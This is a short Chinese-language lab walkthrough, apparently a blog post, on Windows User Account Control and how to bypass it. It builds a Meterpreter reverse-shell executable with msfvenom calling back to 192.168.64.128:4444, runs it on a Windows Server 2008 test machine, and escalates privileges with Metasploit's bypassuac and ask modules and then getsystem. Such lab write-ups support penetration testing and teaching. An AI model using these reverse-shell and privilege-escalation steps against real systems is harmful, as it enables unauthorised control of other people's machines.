用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序损坏系统的效果。
如果在操作系统上做某些事情(读写Windows目录之类的),uac会跳出来要求认证,需要uac提权做的事情有:更新,更改用户账户等等
先做个🐎出来msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.128 lport=4444 -f exe -o test.exe
丢到Windows server 2008上并且运行
开个msfconsole,如下配置
运行🐎后可以看到已经上线了,运行一下ipconfig验证是那台server 2008
然后在sessions中可以看到现在的用户是user1
接下来开始提权use exploit/windows/local/bypassuac
接着run一下,如果出现下面的情况则证明不行
这时还有一种做法use exploit/windows/local/ask
然后run一下
发现可以,这时server 2008会弹出验证窗口
输入完管理员密码点击是后
这边就会进入新的会话,用getuid查看发现提权成功了
接下来可以用getsystem继续提权
提权成功
